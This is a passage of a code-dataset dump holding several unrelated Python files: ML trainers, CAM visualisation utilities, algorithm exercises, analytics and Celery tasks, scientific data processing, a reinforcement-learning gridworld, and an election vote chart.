data['src_len']\r\n\r\n tgt_tokens = data['tgt_tokens']\r\n tgt_len = data['tgt_len']\r\n\r\n is_update = False\r\n if (train_step + 1) % args.grad_acc == 0:\r\n is_update = True\r\n update_cnt += 1\r\n\r\n # full_train(self, q_tokens, q_len, a_tokens, a_len, is_update=True, ratio = 1.0):\r\n _loss = gptTrainer.full_train(src_tokens, src_len, tgt_tokens, tgt_len, is_update=is_update, ratio = 1.0 / args.grad_acc / device_num)\r\n\r\n if task_idx == 0:\r\n dq_loss.update(_loss)\r\n elif task_idx == 1:\r\n da_loss.update(_loss)\r\n\r\n if is_update and update_cnt % args.save_checkpoints_steps == 0 : \r\n gptTrainer.save_model(args.output_dir + '/model.'+str(update_cnt)+'.epoch')\r\n\r\n bar.suffix = '({batch}/{size}) Total: {total:} | ETA: {eta:} | dq_loss: {dq_loss.val:.3f} ({dq_loss.avg:.3f}) | da_loss: {da_loss.val:.3f} ({da_loss.avg:.3f})'.format(\r\n batch=train_step,\r\n size=num_train_steps * args.grad_acc,\r\n total=bar.elapsed_td,\r\n eta=bar.eta_td,\r\n dq_loss=dq_loss,\r\n da_loss=da_loss)\r\n bar.next()\r\n bar.finish()\r\n \r\n gptTrainer.save_model(args.output_dir + '/model.done.epoch')\r\n gptTrainer.complete()\r\n\r\n\r\n\r\ndef lr_schedule(init_lr, num_train_steps, num_warmup_steps):\r\n lr_sched = '0:0.0,'+str(num_warmup_steps)+':'+str(init_lr)+','+str(num_train_steps)+':0.0'\r\n print(lr_sched)\r\n return lr_sched\r\n\r\ndef main():\r\n tokenizer = encoder.get_encoder('', args.vocab_file)\r\n if not os.path.exists(args.output_dir):\r\n os.makedirs(args.output_dir)\r\n\r\n # training.\r\n if args.mode == 0: \r\n print('loading training data', args.train_file)\r\n train_examples = read_coqa_examples(input_file=args.train_file, tokenizer=tokenizer, history=100, turn_ids=[1])\r\n\r\n # Pre-shuffle the input to avoid having to make a very large shuffle buffer in in the `input_fn`.\r\n print('shuffling training data')\r\n rng = random.Random(12345)\r\n rng.shuffle(train_examples)\r\n \r\n dq_train_features = convert_examples_to_features(examples=train_examples,\r\n tokenizer=tokenizer,\r\n pad_token=args.pad_token,\r\n max_seq_length=args.max_seq_length,\r\n max_ans_length=args.max_ans_length,\r\n max_query_length=args.max_query_length,\r\n fea_style=0)\r\n\r\n da_train_features = convert_examples_to_features(examples=train_examples,\r\n tokenizer=tokenizer,\r\n pad_token=args.pad_token,\r\n max_seq_length=args.max_seq_length,\r\n max_ans_length=args.max_ans_length,\r\n max_query_length=args.max_query_length,\r\n fea_style=1)\r\n \r\n tmp_batch_size = int(args.batch_size / args.grad_acc)\r\n\r\n dq_train_dataset = seq2seq_dataset(dq_train_features, tmp_batch_size, True)\r\n dq_train_loader = DataLoader(dq_train_dataset, batch_size=tmp_batch_size, num_workers=0, shuffle=True, drop_last=True)\r\n\r\n da_train_dataset = seq2seq_dataset(da_train_features, tmp_batch_size, True)\r\n da_train_loader = DataLoader(da_train_dataset, batch_size=tmp_batch_size, num_workers=0, shuffle=True, drop_last=True)\r\n\r\n task_loaders = [dq_train_loader, da_train_loader]\r\n\r\n num_train_steps = int( (len(dq_train_features) + len(da_train_features)) / args.batch_size * args.num_train_epochs)\r\n num_warmup_steps = int(num_train_steps * args.warmup_proportion)\r\n lr_sched = lr_schedule(args.learning_rate, num_train_steps, num_warmup_steps)\r\n \r\n print(\"Create model and setup enviroument\")\r\n gptTrainer = DistGPTTrainer(args.vocabsize, 1024, 16, 24, 'coqa_gpt', tmp_batch_size, args.max_seq_length, 0.0, device_num)\r\n\r\n if args.seed_type == 0:\r\n gptTrainer.load_pretrained_gpt(args.init_checkpoint)\r\n elif args.seed_type == 1:\r\n gptTrainer.load_model(args.init_checkpoint)\r\n\r\n gptTrainer.allocate_optimizer(args.learning_rate, args.grad_clip, lr_sched, args.weight_decay)\r\n\r\n train(task_loaders, num_train_steps, gptTrainer)\r\n \r\n if args.mode == 1:\r\n print('loading predict data', args.predict_file)\r\n pred_examples = read_coqa_examples(input_file=args.predict_file, tokenizer=tokenizer, history=100, turn_ids=[i for i in range(100)])\r\n\r\n print('convert training example to features.')\r\n dq_pred_features = convert_examples_to_features(examples=pred_examples,\r\n tokenizer=tokenizer,\r\n pad_token=args.pad_token,\r\n max_seq_length=args.max_seq_length,\r\n max_ans_length=args.max_ans_length,\r\n max_query_length=args.max_query_length,\r\n fea_style=0)\r\n\r\n dq_pred_dataset = seq2seq_dataset(dq_pred_features, args.batch_size, False)\r\n dq_pred_loader = DataLoader(dq_pred_dataset, batch_size=args.batch_size, num_workers=0, shuffle=False, drop_last=True)\r\n\r\n gptMrcPredictor = DistGPTPredictor(args.vocabsize, 1024, 16, 24, 'coqa_gpt', args.batch_size, args.beam_size, \r\n args.max_seq_length - args.max_ans_length, args.max_ans_length, device_num)\r\n if args.seed_type == 0:\r\n gptMrcPredictor.load_pretrained_gpt(args.init_checkpoint)\r\n elif args.seed_type == 1:\r\n gptMrcPredictor.load_model(args.init_checkpoint)\r\n\r\n print('prediction lines', len(dq_pred_features))\r\n\r\n #mrcPredictor = mrcTrainer\r\n all_results = predict_mrc(dq_pred_loader, tokenizer, gptMrcPredictor)\r\n output_prediction_file = os.path.join(args.output_dir, \"predictions.json\")\r\n write_predictions(dq_pred_features, all_results, output_prediction_file)\r\n\r\nif __name__ == \"__main__\":\r\n main()","sub_path":"python/gpt_finetune/dq_da_coqa_trainer.py","file_name":"dq_da_coqa_trainer.py","file_ext":"py","file_size_in_byte":13520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"520030920","text":"import renom.cuda as cu\nfrom renom.debug_graph import showmark\nfrom renom.core.basic_ops import to_value\nfrom renom.core import UnaryOp, Node\nfrom renom.layers.function.parameterized import Sequential\nfrom renom.layers.activation.relu import Relu\nimport renom\nimport renom as rm\nimport numpy as np\nfrom renom.cuda import set_cuda_active\nimport sys\nsys.setrecursionlimit(5000)\nif cu.has_cuda():\n from renom.cuda.gpuvalue import get_gpu\n\n\nmodel_types = ['VGG16', 'VGG19', 'ResNet18', 'ResNet34', 'ResNet50',\n 'ResNet101', 'ResNet152', 'ResNeXt50', 'ResNeXt101', 'DenseNet121', 'Sequential']\n\n# Guided Back-propagation version of ReLU function\n\n\n@showmark\nclass relu_gb(UnaryOp):\n\n @classmethod\n def _oper_cpu(cls, arg):\n return np.maximum(arg, 0)\n\n @classmethod\n def _oper_gpu(cls, arg):\n ret = get_gpu(arg).empty_like_me()\n cu.curelu_foward(get_gpu(arg), ret)\n return ret\n\n def _backward_cpu(self, context, dy, **kwargs):\n if isinstance(self.attrs._arg, Node):\n dy = np.where(dy > 0, dy, 0)\n self.attrs._arg._update_diff(context, np.where(self == 0, 0, dy), **kwargs)\n\n def _backward_gpu(self, context, dy, **kwargs):\n if isinstance(self.attrs._arg, Node):\n dx = get_gpu(self.attrs._arg).empty_like_me()\n cu.curelu_backard(get_gpu(self.attrs._arg), dx)\n dy_new = get_gpu(dy).empty_like_me()\n cu.curelu_foward(get_gpu(dy), dy_new)\n self.attrs._arg._update_diff(context, dx * dy_new, **kwargs)\n\n\nclass Relu_GB:\n '''Modified Rectified Linear Unit activation function for Guided Backpropagation.\n Backward pass is modified according to reference below\n\n :math:`f(x)=max(x, 0)`\n\n Args:\n x (ndarray, Node): Input numpy array or Node instance.\n\n Example:\n >>> import renom as rm\n >>> import numpy as np\n >>> x = np.array([[1, -1]])\n array([[ 1, -1]])\n >>> rm.relu(x)\n relu([[ 1. , 0.]])\n\n >>> # instantiation\n >>> activation = rm.Relu()\n >>> activation(x)\n relu([[ 1. , 0]])\n\n '''\n\n def __call__(self, x):\n return relu_gb(x)\n\n\ndef convert_relus(model):\n if isinstance(model, Sequential):\n model_dict = model.__dict__\n for k, v in model_dict.items():\n if isinstance(v, Relu):\n model_dict[k] = Relu_GB()\n elif k == '_layers':\n for i, e in enumerate(model_dict[k]):\n if isinstance(e, Relu):\n model_dict[k][i] = Relu_GB()\n else:\n convert_relus(model_dict[k][i])\n else:\n convert_relus(model_dict[k])\n else:\n try:\n model_dict = model.__dict__\n if 'model' in model_dict.keys():\n convert_relus(model_dict['model'])\n for k, v in model_dict.items():\n if isinstance(v, Relu):\n model_dict[k] = Relu_GB()\n elif k != '_parameters':\n convert_relus(model_dict[k])\n except:\n if isinstance(model, list):\n for e in model:\n if isinstance(e, Relu):\n model[e] = Relu_GB()\n else:\n convert_relus(model[e])\n elif isinstance(model, Relu):\n model = Relu_GB()\n return model\n\n\ndef vgg_cam(model, x, class_id, mode):\n x = model._model.block1(x)\n x = model._model.block2(x)\n x = model._model.block3(x)\n x = model._model.block4(x)\n final_conv = rm.Sequential(model._model.block5[:-1])(x)\n x = model._model.block5[-1](final_conv)\n x = rm.flatten(x)\n x = rm.relu(model._model.fc1(x))\n x = rm.relu(model._model.fc2(x))\n x = model._model.fc3(x)\n if mode == 'plus':\n x = rm.exp(x)\n x_c = x[:, class_id]\n return rm.sum(x_c), final_conv\n\n\ndef resnet_cam(model, x, class_id, mode):\n x = model._model.conv1(x)\n x = model._model.bn1(x)\n x = model._model.relu(x)\n x = model._model.maxpool(x)\n x = model._model.layer1(x)\n x = model._model.layer2(x)\n x = model._model.layer3(x)\n final_conv = model._model.layer4(x)\n x = rm.average_pool2d(final_conv, filter=(final_conv.shape[2], final_conv.shape[3]))\n x = model._model.flat(x)\n x = model._model.fc(x)\n if mode == 'plus':\n x = rm.exp(x)\n x_c = x[:, class_id]\n return rm.sum(x_c), final_conv\n\n\ndef densenet_cam(model, x, class_id, mode):\n i = 0\n t = model._model.base[i](x)\n i += 1\n t = rm.relu(model._model.base[i](t))\n i += 1\n t = rm.max_pool2d(t, filter=3, stride=2, padding=1)\n for j in model._model.layer_per_block[:-1]:\n for k in range(j):\n tmp = t\n t = model._model.base[i](t)\n i += 1\n t = rm.concat(tmp, t)\n t = model._model.base[i](t)\n i += 1\n for j in range(model._model.layer_per_block[-1]):\n tmp = t\n t = model._model.base[i](t)\n i += 1\n t = rm.concat(tmp, t)\n final_conv = t\n t = rm.average_pool2d(t, filter=7, stride=1)\n t = rm.flatten(t)\n t = model._model.fc(t)\n if mode == 'plus':\n t = rm.exp(t)\n x_c = t[:, class_id]\n return rm.sum(x_c), final_conv\n\n\ndef sequential_cam(model, x, class_id, mode, node_index):\n for i in range(len(model._layers)):\n x = model._layers[i](x)\n if i == node_index:\n final_conv = x\n if mode == 'plus':\n x = rm.exp(x)\n if x.shape[1] > 1:\n t_c = x[:, class_id]\n else:\n t_c = x\n return rm.sum(t_c), final_conv\n","sub_path":"renom_img/api/utility/visualize/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"279353378","text":"def find_max_crossing(A, low, mid, high):\n left_sum, right_sum = -1000000, -1000000 # 准确应该用负无穷\n max_left, max_right = 0, 0\n sum_i, sum_j = 0, 0\n for i in range(-mid, -low):\n sum_i += A[-i]\n if sum_i > left_sum:\n left_sum = sum_i\n max_left = -i\n\n for j in range(mid+1, high):\n sum_j += A[j]\n if sum_j > right_sum:\n right_sum = sum_j\n max_right = j\n return max_left, max_right, left_sum + right_sum\n\n\ndef find_maximum(A, low, high):\n A.append(0)\n sum_A,index = 0, 0\n for i in range(len(A)):\n if A[i] >= 0:\n sum_A += A[i]\n index += 1\n if index == len(A):\n return low, high, sum_A\n\n if high == low:\n return low, high, A[low]\n else:\n mid = (low + high)//2\n left_data = left_low, left_high, left_sum = find_maximum(A, low, mid)\n right_data = right_low, right_high, right_sum = find_maximum(A, mid+1, high)\n cross_data = cross_low, cross_high, cross_sum = find_max_crossing(A, low, mid, high)\n\n if left_sum >= right_sum and left_sum >= cross_sum:\n return left_data\n if right_sum >= left_sum and right_sum >= cross_sum:\n return right_data\n else:\n return cross_data\n\n\nif __name__ == \"__main__\":\n A = [1, 3, -5, 4, -4, 0, 1, 9, 9]\n print(find_maximum(A, 0, len(A)))\n","sub_path":"学习/算法导论/分治策略/maximum.py","file_name":"maximum.py","file_ext":"py","file_size_in_byte":1420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"513017570","text":"import pytz\nimport logging\nfrom modularodm import Q\nfrom dateutil.parser import parse\nfrom datetime import datetime, timedelta\n\nfrom website.app import init_app\nfrom website.models import User, Node, Institution\nfrom scripts.analytics.base import SummaryAnalytics\n\n\nlogger = logging.getLogger(__name__)\nlogging.basicConfig(level=logging.INFO)\n\n\nclass InstitutionSummary(SummaryAnalytics):\n\n @property\n def collection_name(self):\n return 'institution_summary'\n\n def get_institutions(self):\n institutions = Institution.find(Q('_id', 'ne', None))\n return institutions\n\n def get_events(self, date):\n super(InstitutionSummary, self).get_events(date)\n from osf.models import AbstractNode, Registration\n\n institutions = self.get_institutions()\n counts = []\n\n # Convert to a datetime at midnight for queries and the timestamp\n timestamp_datetime = datetime(date.year, date.month, date.day).replace(tzinfo=pytz.UTC)\n query_datetime = timestamp_datetime + timedelta(1)\n\n for institution in institutions:\n user_query = Q('affiliated_institutions', 'eq', institution)\n node_query = (\n Q('is_deleted', 'ne', True) &\n Q('date_created', 'lt', query_datetime)\n )\n\n project_query = node_query & Q('parent_nodes', 'eq', None)\n public_query = Q('is_public', 'eq', True)\n private_query = Q('is_public', 'eq', False)\n node_public_query = node_query & public_query\n node_private_query = node_query & private_query\n project_public_query = project_query & public_query\n project_private_query = project_query & private_query\n count = {\n 'institution':{\n 'id': institution._id,\n 'name': institution.name,\n },\n 'users': {\n 'total': User.find(user_query).count(),\n },\n 'nodes': {\n 'total':AbstractNode.find_by_institutions(institution, node_query).count(),\n 'public': AbstractNode.find_by_institutions(institution, node_public_query).count(),\n 'private': AbstractNode.find_by_institutions(institution, node_private_query).count(),\n },\n 'projects': {\n 'total': Node.find_by_institutions(institution, project_query).count(),\n 'public': Node.find_by_institutions(institution, project_public_query).count(),\n 'private': Node.find_by_institutions(institution, project_private_query).count(),\n },\n 'registered_nodes': {\n 'total': Registration.find_by_institutions(institution, node_query).count(),\n 'public': Registration.find_by_institutions(institution, node_public_query).count(),\n 'embargoed': Registration.find_by_institutions(institution, node_private_query).count(),\n },\n 'registered_projects': {\n 'total': Registration.find_by_institutions(institution, project_query).count(),\n 'public': Registration.find_by_institutions(institution, project_public_query).count(),\n 'embargoed': Registration.find_by_institutions(institution, project_private_query).count(),\n },\n 'keen': {\n 'timestamp': timestamp_datetime.isoformat()\n }\n }\n\n logger.info(\n '{} Nodes counted. Nodes: {}, Projects: {}, Registered Nodes: {}, Registered Projects: {}'.format(\n count['institution']['name'],\n count['nodes']['total'],\n count['projects']['total'],\n count['registered_nodes']['total'],\n count['registered_projects']['total']\n )\n )\n\n counts.append(count)\n return counts\n\n\ndef get_class():\n return InstitutionSummary\n\n\nif __name__ == '__main__':\n init_app()\n institution_summary = InstitutionSummary()\n args = institution_summary.parse_args()\n yesterday = args.yesterday\n if yesterday:\n date = (datetime.today() - timedelta(1)).date()\n else:\n date = parse(args.date).date() if args.date else None\n events = institution_summary.get_events(date)\n institution_summary.send_events(events)\n","sub_path":"scripts/analytics/institution_summary.py","file_name":"institution_summary.py","file_ext":"py","file_size_in_byte":4505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"527376135","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n# ------------------------------------------------------------------------------\n# \n# Author: Gabriele Girelli\n# Email: gigi.ga90@gmail.com\n# Date: 20190704\n# \n# ------------------------------------------------------------------------------\n\n# DEPENDENCIES =================================================================\n\nimport argparse\nimport numpy as np\nimport os\nimport pandas as pd\nimport sys\n\nfrom ggc.args import check_threads\nfrom joblib import Parallel, delayed\nfrom tqdm import tqdm\n\n# PARAMETERS ===================================================================\n\n# Add script description\nparser = argparse.ArgumentParser( description = '''\nGenerate mean and median condition profiles, from lamina to center, starting\nfrom previously extract nuclear voxel data.\n''', formatter_class = argparse.RawDescriptionHelpFormatter)\n\n# Add mandatory arguments\nparser.add_argument('prefix', type = str, help = '''\n\tUser prefix (usually in the format \"iFL\").''')\nparser.add_argument('rootdir', type = str, help = '''\n\tPath to root directory with nuclear voxel content.''')\n\n# Add arguments with default value\nparser.add_argument('-n', '--nbins', type = int, help = \"\"\"\n\tNumber of bins from lamina to center. Default: 200\"\"\", default = 200)\nparser.add_argument('--selected', type = str, help = \"\"\"\n\tPath to table of selected nuclei. Mandatory columns: condition, sid, nid\"\"\")\nparser.add_argument('-S', '--suffix', type = str, help = \"\"\"\n\tSuffix for output files.\"\"\", default = \"\")\nparser.add_argument('-O', '--outdir', type = str, help = \"\"\"\n\tPath to output directory where the output should be written to.\"\"\")\nparser.add_argument('-t', '--threads', metavar = 'nthreads', type = int,\n\tdefault = 1, help = \"\"\"Number of threads to be used for parallelization.\"\"\")\n\n# Version flag\nversion = \"0.0.1\"\nparser.add_argument('--version', action = 'version',\n\tversion = '%s v%s' % (sys.argv[0], version,))\n\n# Parse arguments\nargs = parser.parse_args()\n\nassert os.path.isdir(args.rootdir)\nif type(None) == type(args.outdir):\n\targs.outdir = os.path.dirname(args.rootdir)\nelse:\n\tassert os.path.isdir(args.outdir)\n\nif 0 != len(args.suffix):\n\tif not args.suffix.startswith(\".\"):\n\t\targs.suffix = f\".{args.suffix}\"\n\nargs.threads = check_threads(args.threads)\n\nprint(f'''\n # {sys.argv[0]} v{version}\n\n Prefix : {args.prefix}\n Root : {args.rootdir}\n Selected : {args.selected}\n Suffix : \"{args.suffix}\"\n Output : {args.outdir}\n #bins : {args.nbins}\n #threads : {args.threads}\n''')\n\n# FUNCTIONS ====================================================================\n\ndef mkStatProfile(data, k):\n\td = {}\n\tif 0 != len(data):\n\t\td[k+'_mean'] = [np.nanmean(data)]\n\t\td[k+'_median'] = [np.nanmedian(data)]\n\telse:\n\t\td[k+'_mean'] = [np.nan]\n\t\td[k+'_median'] = [np.nan]\n\treturn(d)\n\ndef get_nucleus_profile(fname, args):\n\tfname = f\"{fname}.vx.tsv\"\n\n\tbins = [{\"mid\":(breaks[i]+breaks[i+1])/2,\"dna\":[],\"sig\":[],\"rat\":[]}\n\t\tfor i in range(args.nbins)]\n\n\twith open(os.path.join(args.rootdir, fname), \"r\") as IH:\n\t\tdrop = next(IH)\n\t\tfor line in IH:\n\t\t\tdata = line.strip().split(\"\\t\")\n\n\t\t\tx = float(data[5])\n\t\t\tfor bid in range(args.nbins):\n\t\t\t\tif breaks[bid] >= x:\n\t\t\t\t\tbreak\n\n\t\t\tbins[bid]['dna'].append(float(data[0]))\n\t\t\tbins[bid]['sig'].append(float(data[1]))\n\t\t\tbins[bid]['rat'].append(float(data[2]))\n\n\tfor bid in range(len(bins)):\n\t\tbinData = {\"mid\":[bins[bid]['mid']], \"eid\":eid, \"sn\":fname.split(args.prefix)[0]}\n\t\tfor k in ['dna', 'sig', 'rat']:\n\t\t\tbinData.update(mkStatProfile(bins[bid][k], k))\n\t\tbins[bid] = pd.DataFrame.from_dict(binData)\n\t\n\treturn pd.concat(bins).reset_index(drop = True)\n\n# RUN ==========================================================================\n\nflist = os.listdir(args.rootdir)\n\nmeta = {}\nfor fname in flist:\n\tif fname.endswith(\".vx.tsv\"):\n\t\teid = args.prefix + fname.split(\"_\")[0].split(args.prefix)[1]\n\t\tif eid not in meta.keys():\n\t\t\tmeta[eid] = [fname.split(\".\")[0]]\n\t\telse:\n\t\t\tmeta[eid].append(fname.split(\".\")[0])\n\nselectedNuclei = set()\nif type(None) != type(args.selected):\n\tassert os.path.isfile(args.selected)\n\tnTable = pd.read_csv(args.selected, sep = \"\\t\")\n\treqCols = (\"condition\", \"sid\", \"nid\")\n\n\tassert all([x in nTable.columns for x in reqCols])\n\tfor i in range(nTable.shape[0]):\n\t\tn = nTable.loc[i]\n\t\tsignature = f's{n[\"sid\"]}n{n[\"nid\"]}{n[\"condition\"]}'\n\t\tselectedNuclei.add(signature)\n\n\tassert 0 != np.sum([len(meta[x]) for x in meta.keys()])\n\tfor eid in meta.keys():\n\t\tmeta[eid] = [n for n in meta[eid] if n in selectedNuclei]\n\nassert 0 != np.sum([len(meta[x]) for x in meta.keys()])\n\nbreaks = np.linspace(0, 1, args.nbins+1)\nallData = []\neidn = 0\nfor eid in sorted(meta.keys()):\n\tprofiles = Parallel(n_jobs = args.threads, verbose = 0)(\n\t delayed(get_nucleus_profile)(fname, args)\n\t for fname in tqdm(meta[eid],\n\t \tdesc = f'{eidn+1}/{len(meta)} {eid} [n.threads={args.threads}]'))\n\tallData.extend(profiles)\n\teidn += 1\n\nprint(\"Merging and writing...\")\npd.concat(allData).reset_index(drop = True).to_csv(\n\tos.path.join(args.outdir, f'nuclear.profiles{args.suffix}.tsv'),\n\tsep = '\\t', index = False, header = True)\n\n# END ==========================================================================\n\n################################################################################\n","sub_path":"src/extract_nuclear_profiles.py","file_name":"extract_nuclear_profiles.py","file_ext":"py","file_size_in_byte":5268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"276801224","text":"import numpy as np\nfrom time import sleep\nfrom ttkthemes import ThemedTk as tk\nfrom tkinter import ttk\n\nclass Window:\n def __init__(self):\n self.root = tk(theme='radiance')\n #self.root.get_themes()\n #self.root.set_theme('radiance')\n self.b = ttk.Button(self.root,text='hola')\n self.b.pack()\n self.root.mainloop()\n#w = Window()\n\nY_REGION = 16\nX_REGION = 20\nINITIAL_STATE = (0.5,0.5)\nGOAL = ((4.3,5.3),(8.9,9.9))\nOBSTACLES = []\nNUM_MAGNITUDES_OF_EACH_BEHAVIOR = 5\nNUM_BEHAVIORS = 4\nTOTAL_OUTPUTS = NUM_MAGNITUDES_OF_EACH_BEHAVIOR*NUM_BEHAVIORS\ndef ReLU(z):\n z[z<0] = 0\n return z\ndef ReLU_prime(z):\n z[z>0] = 1\n z[z<=0] = 0\n return z\ndef get_center(ranges):\n center =(ranges[0][0] + ranges[0][1])/2,(ranges[1][0] + ranges[1][1])/2\n return center\ndef get_euclidean_distance_to_goal(state,goal):\n s = state\n g = goal\n x_dist = np.abs(s[1]-g[1])\n y_dist = np.abs(s[0]-g[0])\n euc_dis = np.sqrt(np.power(x_dist,2)+np.power(y_dist,2))\n return euc_dis\nclass Environment:\n def __init__(self,y_region,x_region,initial_state,goal):\n self.y_region = y_region\n self.x_region = x_region\n self.initial_state = initial_state\n self.state = initial_state\n self.goal = goal\n self.goal_center = get_center(self.goal)\n self.terminal = False\n self.last_state = None\n self.last_distance_to_goal = get_euclidean_distance_to_goal(self.state,self.goal_center)\n self.behavior_step = 1\n self.jump_distance = 2\n #self.magnitud_of_movement =\n def next_state(self,behavior,value):\n self.last_state = self.state\n y = 0\n x = 0\n #print('v',value)\n #print('b',behavior)\n nmoeb = NUM_MAGNITUDES_OF_EACH_BEHAVIOR\n if 0<=behavior<=nmoeb-1:\n # print('0-2')\n y = -0.5 - behavior*self.jump_distance\n elif nmoeb<=behavior<=2*nmoeb-1:\n # print('3-5')\n x = -0.5 - (behavior-nmoeb)*self.jump_distance\n elif 2*nmoeb<=behavior<=3*nmoeb-1:\n # print('6-8')\n y = 0.5 + (behavior-2*nmoeb)*self.jump_distance\n elif 3*nmoeb<=behavior<=4*nmoeb-1:\n # print('9-11')\n x = 0.5 + (behavior-3*nmoeb)*self.jump_distance\n# if behavior == 0:\n# y =-self.behavior_step\n# elif behavior == 1:\n# x =-self.behavior_step\n# elif behavior == 2:\n# y = self.behavior_step\n# elif behavior == 3:\n# x = self.behavior_step\n if 0 <= self.state[1] + x <= X_REGION and 0 <= self.state[0] + y <= Y_REGION:\n #sección para colocar código que verifique si el agente esta dentro de\n #una región de un bloque\n self.state = (self.state[0]+y ,self.state[1]+x)\n return self.state\n\n def get_reward(self):\n new_dist = get_euclidean_distance_to_goal(self.state,self.goal_center)\n if self.goal[0][0]<=self.state[0]<=self.goal[0][1] and \\\n self.goal[1][0]<=self.state[1]<=self.goal[1][1]:\n self.terminal = True\n return 1\n\n# elif new_distmin_eps:\n agent.eps *=eps_decaying_factor\n agent.lr *=lr_decaying_factor\n\n print('GOAL',env.goal_center,episodes[-1])\n","sub_path":"shallow_nn_rl_distance.py","file_name":"shallow_nn_rl_distance.py","file_ext":"py","file_size_in_byte":8450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"432537910","text":"import os, math\n\nfrom opendm import log\nfrom opendm import io\nfrom opendm import system\nfrom opendm import context\nfrom opendm import mesh\nfrom opendm import gsd\nfrom opendm import types\n\n\ndef mesh_3d(odm_mesh_folder,odm_mesh_ply, filter_point_cloud_path, max_concurrency):\n if not io.file_exists(odm_mesh_ply):\n log.ODM_INFO('Writing ODM Mesh file in: %s' % odm_mesh_ply)\n oct_tree =10\n samples = 1.0\n max_vertex = 200000\n point_weight = 4\n verbose = False\n mesh.screened_poisson_reconstruction(filter_point_cloud_path,\n odm_mesh_ply,\n depth=oct_tree,\n samples=samples,\n maxVertexCount=max_vertex,\n pointWeight=point_weight,\n threads=max(1, max_concurrency- 1), # poissonrecon can get stuck on some machines if --threads == all cores\n verbose=verbose)\n\n else:\n log.ODM_WARNING('Found a valid ODM Mesh file in: %s' %\n odm_mesh_ply)\n","sub_path":"mesh_interface.py","file_name":"mesh_interface.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"237956553","text":"def linearSearch(arr, x): \r\n for i in range(len(arr)): \r\n if arr[i] == x: \r\n return i \r\n\r\ndef binary_search(arr, x): \r\n low = 0\r\n high = len(arr) - 1\r\n mid = 0\r\n \r\n while low <= high: \r\n mid = (high + low) // 2\r\n if arr[mid] < x: \r\n low = mid + 1\r\n\r\n elif arr[mid] > x: \r\n high = mid - 1\r\n \r\n else: \r\n return mid \r\n \r\n \r\narr = [ 2, 3, 4, 10, 40 ] \r\nx = 10\r\n \r\n\r\nopt = input(\"enter l or b for searching\")\r\nif opt == \"b\":\r\n result= binary_search(arr,x)\r\n print(\"binary search\")\r\n print(result)\r\n \r\nelif opt == \"l\":\r\n result= linearSearch(arr,x)\r\n print(\"linear search\")\r\n print(result)\r\n","sub_path":"prac5.py","file_name":"prac5.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"440529098","text":"from celery import shared_task\nfrom .models import Post, Category\nfrom datetime import datetime\nfrom django.template.loader import render_to_string\nfrom django.core.mail import EmailMultiAlternatives\nimport time\n\n@shared_task\ndef my_job():\n tags_post_dict = {}\n tags_users_dict = {}\n list_of_posts = []\n list_of_users = []\n tags_subs = {}\n for tag in Category.objects.all():\n tags_post_dict[tag.tag] = Post.objects.filter(create_time__gt= datetime.fromtimestamp(datetime.timestamp(datetime.now()) - 604800), categories=tag)\n tags_users_dict[tag.tag] = Category.objects.get(tag=tag).subscribers.all()\n list_of_posts.append(Post.objects.filter(create_time__gt= datetime.fromtimestamp(datetime.timestamp(datetime.now()) - 604800), categories=tag))\n\n\n for tag in Category.objects.all():\n posts = tags_post_dict[tag.tag]\n users = tags_users_dict[tag.tag]\n emails = []\n for user in users:\n emails.append(user.email)\n html_content = render_to_string(\n '../templates/weekly_subscription.html',\n {\n 'posts': posts, 'tag': tag.tag,\n }\n )\n msg = EmailMultiAlternatives(\n subject='Недельная рассылка новостей',\n body='',\n from_email='zagaalexey@yandex.ru',\n to= emails\n )\n msg.attach_alternative(html_content, \"text/html\")\n msg.send()","sub_path":"news/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"576731088","text":"'''\nThis script produces a bar graph of candidate votes for the original election. Only the original election dataset\nis required. \nEthan Eason, August 2019\n'''\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport os\nimport numpy as np\n\n# reads in data for the original election\ndf_path = os.path.join('D:/Honduras Project Data', 'Honduras_Election_Data.csv')\ndf = pd.read_csv(df_path)\n\n# arrays to store all candidate's respective vote shares in the original election\nJADN = np.sum(df['JADN']) # JOSE ALFONSO DIAZ NARVAEZ\nSACNS = np.sum(df['SACNS']) # SALVADOR ALEJANDRO CESAR NASRALLA SALUM\nEVR = np.sum(df['EVR']) # ELISEO VALLECILLO REYES\nLEAP = np.sum(df['LEAP']) # LUCAS EVANGELISTO AGUILERA PINEDA\nLOZM = np.sum(df['LOZM']) # LUIS ORLANDO ZELAYA MEDRANO\nROVV = np.sum(df['ROVV']) # ROMEO ORLANDO VASQUEZ VELASQUEZ\nIFA = np.sum(df['IFA']) # ISAIAS FONSECA AGUILAR\nMEAC = np.sum(df['MEAC']) # MARLENE ELIZABETH ALVARENGA CASTELLANOS\nJOHA = np.sum(df['JOHA']) # JUAN ORLANDO HERNANDEZ ALVARADO\n\n# produces bar graph of candidate votes in the original election\nN = 9\nvotes = (JADN, SACNS, EVR, LEAP, LOZM, ROVV, IFA, MEAC, JOHA)\nspc = np.arange(N)\nplt.bar(spc, votes)\nplt.ylabel('Valid Votes')\nplt.xlabel('Candidate')\nplt.xticks(spc, ('JADN', 'SACNS', 'EVR', 'LEAP', 'LOZM', 'ROVV', 'IFA', 'MEAC', 'JOHA'))\nplt.title('Candidate Vote Totals')\nplt.show()\n","sub_path":"analytics/candidate_votes_bar.py","file_name":"candidate_votes_bar.py","file_ext":"py","file_size_in_byte":1399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} 